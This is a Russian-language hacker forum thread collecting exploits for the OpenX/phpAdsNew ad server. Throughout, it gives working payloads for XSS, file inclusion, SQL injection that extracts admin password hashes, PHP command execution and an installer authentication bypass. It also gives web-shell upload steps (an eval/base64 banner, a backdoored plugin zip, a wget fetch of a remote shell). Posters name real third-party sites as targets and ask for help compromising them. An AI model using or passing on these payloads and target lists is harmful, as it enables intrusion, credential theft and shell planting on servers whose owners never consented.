Обновлено 21.04.2010 (Спасибо всем за активность)

[ + ] Общая информация:
Сайт: http://openx.org
Текущая версия: OpenX 2.8.5

[ + ] Краткий экскурс в названия:
phpAdsNew, Openads, OpenX - это название одного продукта, которое менялось в течении времени.

phpAdsNew - название движка c версии 2.0 до 2.0.9
Openads - название движка c версии 2.0.10 до 2.4.3
OpenX - название движка c версии 2.4.4 до настоящего момента


[ + ] Структура БД:
>> ветка OpenX 2.6; OpenX 2.8
Префикс: ox_
Таблица: users
Поля: user_id, email_address, username, password
user_id админа = 1
Алгоритм хеширования пароля md5

>> ветка OpenX 2.4
Префикс: ox_
Таблица: preference
Поля: agencyid, admin, admin_pw, admin_email
agencyid админа = 0
Алгоритм хеширования пароля md5

>> ветка OpenX 2.0
Префикс: phpads_
Таблица: config
Поля: configid, admin, admin_pw, admin_email
configid админа = 0
Алгоритм хеширования пароля md5


[ + ] Уязвимости для всей ветки OpenX 2.0 [phpAdsNew все версии, Openads до 2.0.11-pr1 включительно]
>> Раскрытие пути
условия:
+ display_errors = On

сплоит: http://host/adlayer.php?layerstyle=antichat
http://host/adclick.php?bannerid=id&antichat=xe%0Ak%0A
id - номер существующего баннера


>> XSS
условия:
+ register_globals = On

сплоит: http://host/adcontent.php?bannerid=id&row[prepend]=<script>alert(document.cookie)</script>
http://host/adcontent.php?bannerid=id&row[append]=<script>alert(document.cookie)</script>
id - номер существующего баннера

>> Выполнение php кода
условия:
+ $phpAds_config['type_html_php'] = true; // default false
+ наличие html баннера
+ register_globals = On


сплоит: http://host/adcontent.php?bannerid=id&row[prepend]=<?php phpinfo();?>
id - номер существующего html баннера


[ + ] Уязвимости phpAdsNew 2.0 - 2.0.5
>> Local File Include
http://securityreason.com/achievement_securityalert/21

сплоит: http://host/adlayer.php?layerstyle=../../../../../../../../../../../etc/passwd%00
Примечание: возможно использовать ////[4096]//// как альтернатива null byte

[ + ] Уязвимости phpAdsNew 2.0 - 2.0.4-pr2
>> Выполнение php кода (XML-RPC Library Remote Code Execution)
http://www.securityfocus.com/bid/14088/info

сплоит:
POST /adxmlrpc.php HTTP/1.1
Host: host
Connection: close
Content-Length: 168

<?xml version="1.0"?>
<methodCall>
<methodName>test.method</methodName>
<params>
<param>
<value><name>','')); phpinfo(); exit;/*</name></value>
</param>
</params>
</methodCall>


[ + ] Уязвимости phpAdsNew 2.0 - 2.0.4-pr1
>> Раскрытие пути
http://securityreason.com/achievement_securityalert/9
условия:
+ display_errors = On

сплоит:

http://host/libraries/lib-xmlrpcs.inc.php
http://host/maintenance/maintenance-activation.php
http://host/maintenance/maintenance-cleantables.php
http://host/maintenance/maintenance-autotargeting.php
http://host/maintenance/maintenance-reports.php
http://host/misc/backwards compatibility/phpads.php
http://host/misc/backwards compatibility/remotehtmlview.php
http://host/misc/backwards compatibility/click.php
http://host/adcontent.php


>> XSS
http://securityreason.com/achievement_securityalert/9

сплоит: http://host/adframe.php?refresh=securityreason.com'><script>alert(document.cookie)</script>


[ + ] Уязвимости Openads 2.4.0 - 2.4.2
>> Выполнение php кода
сплоит: http://host/www/delivery/ai.php?filename=antichat.jpg';system($_GET[cmd]);/*&contenttype=antichat&cmd=ls -la

[ + ] Уязвимости OpenX 2.6.0 - 2.6.3
OpenX 2.4.4 - 2.4.9
Openads 2.4.0 - 2.4.3
>> Local File Include
http://milw0rm.org/exploits/7883
Условия:
+ magic_quotes_gpc = Off

сплоит: http://host/www/delivery/fc.php?MAX_type=../../../../../../../../../../../../../../../etc/passwd%00
Примечание: используется функция file_exists - для проверки, поэтому ////[4096]//// не подойдет как альтернатива null byte

[ + ] Уязвимости OpenX 2.6.0 - 2.6.1
OpenX 2.4.4 - 2.4.8
Openads 2.4.0 - 2.4.3
>> SQL injection
Есть сплоит на milw0rm - мало того что написан как blind sql injection, хотя там обычная инъекция с выводом X_X, так он ещё и корявый, писал какой-то калека.

сплоит для OpenX 2.6.0 - 2.6.1:
http://host/www/delivery/ac.php
?bannerid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_w s(0x3a,u.username,u.password),19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 FROM ox_users u, ox_banners d, ox_clients m, ox_campaigns c WHERE u.user_id=1
Примечание: вывод будет в заголовок страницы <title> ... </title>

сплоит для OpenX 2.4.4 - 2.4.8
Openads 2.4.0 - 2.4.3:
http://host/www/delivery/ac.php
?bannerid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_w s(0x3a,p.admin,p.admin_pw),19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38 from ox_preference p, ox_banners d, ox_campaigns c WHERE p.agencyid=0

Примечание: вывод будет в заголовок страницы <title> ... </title>

[ + ] Уязвимости OpenX 2.6.0 - 2.6.4
OpenX 2.4.4 - 2.4.10
Openads 2.4.0 - 2.4.3
>> Blind sql injection
условия:
+ magic_quotes_gpc = Off

Описаниe: http://resources.enablesecurity.com/advisories/openx-2.6.4-multiple.txt

[ + ] Уязвимости OpenX 2.8.0 - 2.8.5
>> Раскрытие пути
условия:
+ display_errors = On

сплоит:

http://host/www/admin/plugins/oxMarket/library/OX/oxMarket/M2M/PearXmlRpcCustomClientExecutor.php
http://host//www/admin/plugins/oxMarket/library/OX/oxMarket/M2M/ZendXmlRpcCustomClientExecutor.php
http://host/www/admin/plugins/oxMarket/library/OX/oxMarket/Common/ConnectionUtils.php
http://host/www/admin/plugins/oxMarket/library/OX/oxMarket/Common/Cache.php


[ + ] Уязвимости OpenX 2.8.0
>> Обход аутентификации пользователя

сплоит:
POST /www/admin/install.php HTTP/1.1
Host: host
Connection: close
Content-Length: 13

btn_openads=1


[ + ] Уязвимости OpenX 2.8.2 - 2.8.3
>> Раскрытие установочной информации

сплоит:
POST /www/admin/install.php HTTP/1.1
Host: host
Connection: close
Content-Length: 28

btn_openads=1&btn_syscheck=1


Уязвимости которых нет:

phpAdsNew 2.0.4-pr2 Remote File Inclusion Exploit //константу нельзя передать как переменную )))
phpAdsNew-2.0.8/admin/upgrade.php?phpAds_config[language]=../../../etc/passwd%00 //phpAds_config[language] определен в конфиге
phpAdsNew-2.0.8 (adlayer.php) Remote File Include //Там нет даже LFI, не говоря о RFI

phpAdsNew-2.0.7/admin/report-index.php?filename=http://evil_scripts? //Меньше курить надо)
phpAdsNew-2.0.7/admin/lib-gui.inc.php?phpAds_config[my_footer]=http://evil_scripts? //И пить тоже)
phpAdsNew-2.0.7/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=http://evil_scripts?//


PS Если найдете какие либо неточности, ошибки или будут вопросы по уязвимостям, пишите в личку.

Универсальный способ загрузки шелла.
условия:
+ Доступность на запись файла config.inc.php

Описание:
>> Для ветки OpenX 2.0
1.В админ панели выбираем
Настройки ->
(вкладка) Главные настройки ->
(выпадающий список "Выберите раздел:") Настройки баннеров ->
(категория) Опции HTML-баннеров ->
Разрешить выполнение PHP-выражений из HTML-баннера

Сохраняем.

>> Для ветки OpenX 2.4
1. В админ панели выбираем
Настройки ->
(вкладка) Главные настройки ->
(выпадающий список "Выберите раздел:") Настройки доставки ->
(категория) Настройки доставки баннеров ->
Разрешить исполнение кода PHP

Сохраняем.

>> Для ветки OpenX 2.6
1. Переходим в админ панель, в правом верхнем углу ->
(Работает как) Administrator account

В админ панели выбираем
Мой аккуант ->
(вкладка) Общие настройки ->
(выпадающий список "Выберите раздел:") Настройки кэширования доставки ->
(категория) Настройки кэширования доставки ->
Разрешить исполнение кода PHP

Сохраняем.

>> Для ветки OpenX 2.8
1. Переходим в админ панель, в правом верхнем углу ->
(Работает как) Administrator account

В админ панели выбираем
Конфигурация ->
(категория) Общие настройки ->
Настройки доставки баннеров ->
(категория) Настройки доставки баннеров ->
Разрешить исполнение кода PHP

Сохраняем.

2. Добавляем баннер
Выбираем (выпадающий список: Тип баннера) HTML-баннер ->
В поле HTML-баннер ->
<?php
if (!empty($_POST['e']))
@eval(base64_decode($_POST['e']));
?>
test

Сохраняем

3. Узнаем id созданного баннера, его можно увидеть в названии баннера.

4. Передаем, нужные нам параметры:
http://host/adcontent.php?bannerid=id //OpenX 2.0
http://host/www/delivery/ac.php?bannerid=id //OpenX > 2.0

id - номер вашего баннера

Пример запроса для phpinfo() :

POST /www/delivery/ac.php?bannerid=id HTTP/1.1
Host: host
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
e=cGhwaW5mbygpOw==

Хочу заметить что в данном случае удобно использовать плагин для firefox - HackBar

OpenX 2.8.2, раскрытие пути:
/www/admin/plugins/oxMarket/library/OX/oxMarket/M2M/PearXmlRpcCustomClientExecutor.php
/www/admin/plugins/oxMarket/library/OX/oxMarket/M2M/ZendXmlRpcCustomClientExecutor.php
/www/admin/plugins/oxMarket/library/OX/oxMarket/Common/ConnectionUtils.php
/www/admin/plugins/oxMarket/library/OX/oxMarket/Common/Cache.php

Уязвимости OpenX 2.8.0
запрашиваем http:/site.com/openx/www/admin/install.php
оказываемся в админке если есть права на запись в кофиг фаил заливаем шелл
Уязвимости OpenX 2.8.2
В паблике реализации уязвимости пока не видел :
запрашиваем: http:/site.com/openx/www/admin/install.php
передаём постом параметры : btn_openads=1&btn_plugins=1
попадаем в админку заливаем шелл )
узязвимый код в install.php :

..........................................
// No upgrade file? No installer! Unless the user is in the last step
if (!file_exists(MAX_PATH.'/var/UPGRADE') && !isset($_POST['btn_openads'])) {
header("Location: index.php");
exit;
}
.........................................

наличие btn_openads в посте пропускает нас дальше :

else if (array_key_exists('btn_plugins', $_POST))
{
require_once MAX_PATH.'/lib/JSON/JSON.php';
$aUrls = array();

наличие btn_plugins пропускает нас в админку !
Альтернативный спосов заливки shell
Берем стандартный плагин для openx из папки etc/plugins/ скрипта установки.
Добавляем в начало любого из файлов system($_GET['cmd']) для примера : Открываем openX3rdPartyServers.zip и в /plugins/3rdPartyServers/ox3rdPartyServers/ файлу архива добавляем к adtech.class.php system($_GET['cmd']) сохраняем имеем универсальный шелл для версий выше 2.6
Для заливки шелла заходим в админку жмякаем кнопку плагинс в 2,8 версии (В 2,6 тыкаем конфиг->плагинс )в открышемся вкладке такаем кнопку обзор выбераем где у нас хранится наш изменённый openX3rdPartyServers.zip жмякаем на кнопку import code нажимаем кнопку конфиг и наш шелл подгружается ))) или по прямому адресу http:/site.com/openx/plugins/3rdPartyServers/ox3rdPartyServers/adtech.class.php )))))) ещём другую папку доступную для записи к примеру www/images/ (всегда доступна на запись ) и заливаем полноценный шелл к примеру (если есть wget)
"cd ../images/ && wget -O shell.php http://shell.com/shell.txt")
по адресу *www/images/shell.php имеем полноценный шелл

OpenX 2.8.0
OpenX 2.8.2
OpenX 2.8.3

Пока раскрытие установчной директории скрипта и некоторые настройки сервера:

http://url.com/openx/www/admin/install.php

И постом параметры:
btn_openads=1&btn_syscheck=1
Рабочий пример:
igromania.ru
http://bs.igromania.ru/www/admin/install.php

(Dm), спасибо огромное за обзор и остальным также.

Но есть вопрос - добыл из базы хеш и логин, хеш брученый был уже, поэтому ввел логин и пасс в админку - но мне пишет, что нужно включить куки для авторизации.
Куки, естественно, включены. Из-за чего такое может быть?

2попугай а openx вообше выдает баннеры на страницу ? :)
Я тут вот по какому вопросу зашел )))
http://securityreason.com/wlb_show/WLB-2010010098
кто нить что нибудь понимает ? лично я нет, где там иньекция ,сижу втупляю не могу не хрена понять :D и вообше какое это отношение к самому движку имеет то ? ((

2попугай а openx вообше выдает баннеры на страницу ? :)
Я тут вот по какому вопросу зашел )))
http://securityreason.com/wlb_show/WLB-2010010098
кто нить что нибудь понимает ? лично я нет, где там иньекция ,сижу втупляю не могу не хрена понять :D и вообше какое это отношение к самому движку имеет то ? ((

В каком смысле "на страницу"? Хочешь посмотреть существующие банеры? В админке можно это сделать(точно не могу сказать где именно, ибо не помню и openx щас нет).

А насчет инъекции - может у тебя версия другая?

openx.pmgnews.com/www/admin/index.php - 2.8.1
arkansas-catholic.org/adserver/www/admin/index.php - 2.8.1
ikeafans.com/openx/www/admin/index.php - 2.8.2
mondofacto.com/openx/www/admin/index.php - 2.8.2
ultimatecampresource.com/openads/www/admin/index.php - 2.8.3
a.soft32.com/www/admin/index.php - 2.8.3

почему не работает install.php этой ссылки?

openx.pmgnews.com/www/admin/index.php - 2.8.1
arkansas-catholic.org/adserver/www/admin/index.php - 2.8.1
ikeafans.com/openx/www/admin/index.php - 2.8.2
mondofacto.com/openx/www/admin/index.php - 2.8.2
ultimatecampresource.com/openads/www/admin/index.php - 2.8.3
a.soft32.com/www/admin/index.php - 2.8.3

почему не работает install.php этой ссылки?

почему не работает?
http://a.soft32.com/www/admin/install.php
/var/vhost/openx/var OK
/var/vhost/openx/var/cache OK

http://mondofacto.com/openx/www/admin/install.php
/data/www/openx/var OK
/data/www/openx/var/cache OK
/data/www/openx/var/plugins OK
/data/www/openx/var/templates_compiled OK


и так далее....
ты видимо не внимательно читал ...
написано же , что обратится надо к скрипту install.php c POST параметрами
btn_openads=1&btn_syscheck=1

http://securityreason.com/wlb_show/WLB-2010010098
кто нить что нибудь понимает ? лично я нет, где там иньекция ,сижу втупляю не могу не хрена понять :D и вообше какое это отношение к самому движку имеет то ? ((не имеет никакого отношения.

OpenX 2.6.4
LFI
Need: Права админа
/openx/www/admin/stats.php?entity=../../../../../../shell&breakdown=Обязательно пустое.
// shell, у меня там просто в папке с OpenX лежит файл shell.php, там <?PHP phpinfo(); ?> Код выполнился.
Если breakdown не вписать, то будет инклюдиться нечто вроде:
openx/lib/OA/Admin/Statistics/Delivery/Controller/../../../../../../shellAdvertiser.php


// Prepare the stats controller, and populate with the stats
$oStatsController = &OA_Admin_Statistics_Factory::getController($entity . "-" . $breakdown, $aParams);
if (PEAR::isError($oStatsController)) {
phpAds_Die('Error occured', $oStatsController->getMessage());
}
$oStatsController->start();

Ну вроде тот код, т.к. искал по началу в слепую.


Пассивная XSS:

openx/www/admin/stats.php?entity=campaign&breakdown=history&clientid=1&campaignid=1'%22%3E%3Cscript%3Ealert();%3C/script%3E

http://downloads.securityfocus.com/vulnerabilities/exploits/37110.rb

ну а что не прокомментировал сплоит !1111
Загрузка php файлов, для авторизованных пользователей.
Версия <= 2.8.2

нет новой уязвимости в системе OpenX? Меня интересует больше 2.8.1 и 2.8.2. Я не понимаю, как загрузить оболочку, используя btn_openads = 1 и btn_syscheck = 1.

Я здесь еще сайты ..

adserv.eightyfourmedia.com/www/admin/index.php - 2.8.2

openx.rsv05-jugend.de/www/admin/index.php - 2.8.2

ads.apj.dk/www/admin/index.php- 2.8.1

www.mobilescandinavia.dk/openads/www/admin/index.php - 2.8.5

banner.danske-it-eksperter.dk/www/admin/index.php - 2.8.4

openx.findpriser.dk/admin/index.php - 2.8.1

ads.gld.dk/www/admin/index.php - 2.8.5

ads2.dk-kogebogen.dk/www/admin/index.php - 2.8.5

jjokker Вы можете написать здесь шаг за шагом? спасибо

Уязвимости openX

openX 2.8.6

Path disclosure

http://localhost/openx-2.8.6/www/admin/plugins/openXWorkflow/application/bootstrap.php

Path disclosure

display_errors = On


http://localhost/openx-2.8.6/www/admin/plugins/videoReport/stats-debug.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/stats-api.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/stats-export-csv.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/navigation/oxVastMenuChecker.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_area_base.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_area_hollow.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_area_line.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_bar_filled.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_line_dot.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_line_hollow.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_sugar.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_y_axis.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_y_axis_right.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/SmartyFunctions/function.url.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/SmartyFunctions/modifier.formatNumber.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/Graph/Flash/AreaGraph.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/Graph/Flash/BaseGraph.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/Graph/Flash/LineGraph.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/oxMarket.class.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/navigation/oxMarketActiveChecker.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/navigation/oxMarketAdminStatsChecker.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/navigation/oxMarketEntityChecker.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/navigation/oxMarketMultipleAccountsModeChecker.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/navigation/oxMarketStandaloneModeChecker.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/Common/Cache.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/Common/ConnectionUtils.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/Dal/Advertiser.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/Dal/Campaign.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/M2M/PearXmlRpcCustomClientExecutor.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/M2M/ZendXmlRpcCustomClientExecutor.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/CampaignForm.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/CampaignsSettings.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/EntityFormManager.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/EntityHelper.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/EntityScreenManager.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/rule/FloorPriceCompare.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/rule/QuickFormFloorPriceCompareRuleAdaptor.php
...
раскрытий много.

Path disclosure

display_errors = On


http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php

барыжная XSS


http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php?name=%3Cimg%20alt=%22%ED%E0%E 6%EC%E8%22%20onmouseover=%22javascript:alert%28123 %29%22%20%3E

ofc_upload_image.php


/*...*/

// full path to the saved image including fi lename //

$destination=$default_path.basename($_GET['name'] );

echo'Saving your image to: '.$destination;

/*...*/

Записываем шелл

ofc_upload_image.php

rg on


/*...*/

// default path for the image to be stored //

$default_path='../tmp-upload-images/';

if (!file_exists($default_path))mkdir($default_pa th,0777,true);

// full path to the saved image including fi lename //

$destination=$default_path.basename($_GET['name'] );

echo'Saving your image to: '.$destination;

// print_r( $_POST );

// print_r( $_SERVER );

// echo $HTTP_RAW_POST_DATA;

//

// POST data is usually string data, but we� �are passing a RAW .png

// so PHP is a bit confused and $_POST is empty. But it has saved

// the raw bits into $HTTP_RAW_POST_DATA

//

$jfh=fopen($destination,'w') or die("can't open file");

fwrite($jfh,$HTTP_RAW_POST_DATA);

fclose($jfh);

//

// LOOK:

//

exit();

/*...*/

Если б небыло дальше exit(), то можно было лить шелл бес зависимости.




будет текст:


Saving your image to: ../tmp-upload-images/wso.php


Шелл будет тут:


http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/tmp-upload-images/wso.php

localhost/openx-2.8.6 змаенить на [host]/[path]

скоро буду дальше смотреть(времени мало) ...

Решил почитать о $HTTP_RAW_POST_DATA

Оказуетцо, если register_globals off, то все же писать данные в файл возможно.

Только данные урл-кодируютцо, если не урл-кодированные, то мы имеем шелл.

Как послать данные не урл-кодированные думаю все вы знаете.

В $HTTP_RAW_POST_DATA заганяютцо пост-даные напрямую.

в php.ini должно быть


; Always populate the $HTTP_RAW_POST_DATA variable.
always_populate_raw_post_data = On


файл 1.php:




обращаемся:


http://localhost/1.php

результат:

data=12345

експлоит:






Host=localhost
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding=gzip,deflate
Accept-Charset=windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive=115
Connection=keep-alive
Referer=http://localhost/1.html
Cookie=vc=26; OAID=f3376b72128277e77c859bc6ca859fc7
Content-Type=application/x-www-form-urlencoded
Content-Length=21
POSTDATA=Name=


Наш шелл в даном случае тут:


http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php?name=222.php

заменяем localhost/openx-2.8.6 на [host]/[path]

Хе-хе, самое интересное, когда пихать с атрибутом enctype, то нет никакого результата.




зы

PHP Version 5.2.14, нужная директива была закоментирована

Для OpenX 2.8.1 эксп находится по адресу install-plugin.php?status=1&plugin=openXMarket

Почему на конкретном примере по адресу http://www.freegolfschool.com/oa/www/admin/install-plugin.php?status=1&plugin=openXMarket он не работает?

Для версии OpenX 2.8.4 эксп для видео плагина расположен в ofc_upload_image.php.

Я нашел похаканый сайт http://www.knockknockrecords.com/openx/www/admin/plugins/videoReport/lib/tmp-upload-images/, где x.php и cloud.php уже кемто загружены.

Я пробую заюзать http://www.knockknockrecords.com/openx/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php?name=1.php&HTTP_RAW_POST_DATA= ,

но 1.php пуст. Почему?

pXSS

/plugins/deliveryLimitations/Client/lib/phpSniff/index.php


/*...*/

require_once('phpSniff.class.php');

require_once('phpTimer.class.php');

/*...*/

$sniffer_settings = array('check_cookies'=>$GET_VARS['cc'],

'default_language'=>$GET_VARS['dl'],

'allow_masquerading'=>$GET_VARS['am']);

$client =& new phpSniff($GET_VARS['UA'],$sniffer_settings);

/*...*/

">ua

[/COLOR]">get_property('ua');?>

/*...*/[/COLOR]

/plugins/deliveryLimitations/Client/lib/phpSniff/phpSniff.class.php


/*...*/

functionphpSniff($UA='',$settings=true)

{

/*..*/

if(empty($UA)) returnfalse;



$this->_set_browser('ua',$UA);

if($run)$this->init();

/*...*/

functionproperty($p=null)

{ if($p==null)

{ return$this->_browser_info;

}

else

{ return$this->_browser_info[strtolower($p)];

}

}

/*...*/

function_set_browser($k,$v)

{$this->_browser_info[strtolower($k)] =strtolower($v);

}

/*...*/

functionget_property($p)

{ return$this->property($p);

}

/*...*/



PoC
http://[host]/[path]/plugins/deliveryLimitations/Client/lib/phpSniff/index.php?UA=%3Cscript%3Ealert%28123%29%3C/script%3E

Проверил на OpenX 2.8.1, 2.8.2, 2.8.3, 2.8.4, 2.8.6, 2.8.7.

Path disclosure

условия -> никаких

на данный момент на последней ветке 2.8.7 что нашел --> работает


PoC http://[host]/[path]/www/admin/plugins/openXWorkflow/application/bootstrap.php

gabarea,

1.


Для OpenX 2.8.1 эксп находится по адресу install-plugin.php?status=1&plugin=openXMarket
Почему на конкретном примере по адресу http://www.freegolfschool.com/oa/www/admin/install-plugin.php?status=1&plugin=openXMarket он не работает?


http://openx-2.8.1/www/admin/install-plugin.php?status=1&plugin=openXMarket

Там path disclosure не смотря код. Надо посмотреть код.

2.


Я нашел похаканый сайт http://www.knockknockrecords.com/openx/www/admin/plugins/videoReport/lib/tmp-upload-images/, где x.php и cloud.php уже кемто загружены. Я пробую заюзать http://www.knockknockrecords.com/openx/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php?name=1.php&HTTP_RAW_POST_DATA= ,
но 1.php пуст. Почему?


Потому что для експулатации нет условий.

В даном случае:


register_globals Off
always_populate_raw_post_data Off.

Ну если возможно переопределить $HTTP_RAW_POST_DATA как то бес етих директив, то я буду не прав.

(Dm) ты забыл сказать что в phpAdsNew должна быть включена опция:

Опции HTML-баннеров =>Разрешить выполнение PHP-выражений из HTML-баннера

тогда код будет выполнятся, если опция неактивна, то в html-сырцах страницы мы увидим php-код

к сожалению я не так много видел сайтов, где эта опция активирована. а обычно на сайтах запирают файл config.inc.php и шел уже таким способом не залить

Openads v2.3.35-beta

слепая скуля

http://target.com/ads/www/delivery/ac.php?bannerid=24 and 1=1

не знаю может и баян, но в ветке нету

2.0.11 RFI

http://www.site.com/Openads-2.0.11/libraries/lib-view-main.inc.php?row=http://evil.txt?

openx 2.8.7 exploit



openx 2.8.7

Хз нашел вчера мало полезно но хоть что то скуля в админке Слепая как крот

http://test.com/www/admin/updates-history.php

POST_data:


btn_clean_audit=Delete+Artifacts&upgrade_action_id=7{SQLINJ}


P.S Чуток покурил маны мускла склуля не слепая вывод есть

sqlmap -u "http://admin.oads.vimg.net/www/admin/updates-history.php" --method "POST" --data "btn_clean_audit=Delete+Artifacts&upgrade_action_id=7" --dbs

[04:44:20] [INFO] testing connection to the target url

[04:44:21] [INFO] testing if the url is stable, wait a few seconds

[04:44:24] [INFO] url is stable

[04:44:24] [INFO] testing if POST parameter 'btn_clean_audit' is dynamic

[04:44:25] [WARNING] POST parameter 'btn_clean_audit' is not dynamic

[04:44:25] [INFO] testing if POST parameter 'upgrade_action_id' is dynamic

[04:44:25] [WARNING] POST parameter 'upgrade_action_id' is not dynamic

[04:44:25] [INFO] testing if Cookie parameter 'sessionID' is dynamic

[04:44:26] [WARNING] Cookie parameter 'sessionID' is not dynamic

[04:44:26] [INFO] testing if Cookie parameter 'OAGEO' is dynamic

[04:44:27] [WARNING] Cookie parameter 'OAGEO' is not dynamic

[04:44:27] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic

[04:44:27] [WARNING] User-Agent parameter 'User-Agent' is not dynamic

shutting down at: 04:44:27

не работает

Во первых желательно авторизоватся )))

А дальше xakep.ru/post/52222/default.asp - курить сдесь )

[ + ] Уязвимости Openads 2.4.0 - 2.4.2
>> Выполнение php кода
сплоит:
Цитата:
http://host/www/delivery/ai.php?filename=antichat.jpg';system($_GET[cmd]);/*&contenttype=antichat&cmd=ls -la


Помогите с заливкой шелла. Нашел данную уязвимость.


http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=ls -la

выполняется


http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=whereis wget

выполняется


http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=wget http://site2.ru/shell.txt

не выполняется

пробовал аналогично и fetch, и curl - не хочет заливать.

также пробовал указать адрес site2.ru без http, пробовал закодировать в ascii, в base64 и т.д.

Как залить шелл?

Помогите с заливкой шелла. Нашел данную уязвимость.

http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=ls -la

выполняется

http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=whereis wget

выполняется

http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=wget http://site2.ru/shell.txt

не выполняется
пробовал аналогично и fetch, и curl - не хочет заливать.
также пробовал указать адрес site2.ru без http, пробовал закодировать в ascii, в base64 и т.д.
Как залить шелл?



может там нет права на запись? ну или попробуй:

wget http://sait.ru/shell.txt -O /home/polniu put' do papki/shell.php

Пусть можно легко узнать с помощью pwd

Раскрытие путей, тестил на OpenX 2.8.7, 2.8.8

Exploit:


http://openx/www/delivery/dxmlrpc.php

P.S. Сегодня выручила

sql injection


http://site.ru/www/delivery/ac.php?bannerid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_w s(0x3a,p.admin,p.admin_pw),19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38 from ox_preference p, ox_banners d, ox_campaigns c WHERE p.agencyid=0

версия openx 2.4.4

Данная уязвимость не выполняется. Пробовал на других сайтах и другие версии (2.6.0).

Подскажите пожалуйста как правильно ее использовать.

sql injection

http://site.ru/www/delivery/ac.php?bannerid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_w s(0x3a,p.admin,p.admin_pw),19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38 from ox_preference p, ox_banners d, ox_campaigns c WHERE p.agencyid=0

версия openx 2.4.4
Данная уязвимость не выполняется. Пробовал на других сайтах и другие версии (2.6.0).
Подскажите пожалуйста как правильно ее использовать.


может префиксы другие, или таблицы старые! раскручивай просто как инъекцию, а не этому шаблону!

если нет то кидай сцыль

Да, все понял, префиксы везде разные.

OpenX 2.8.8

Path closure (300):


openx288/plugins/3rdPartyServers/ox3rdPartyServers/adtech.class.php

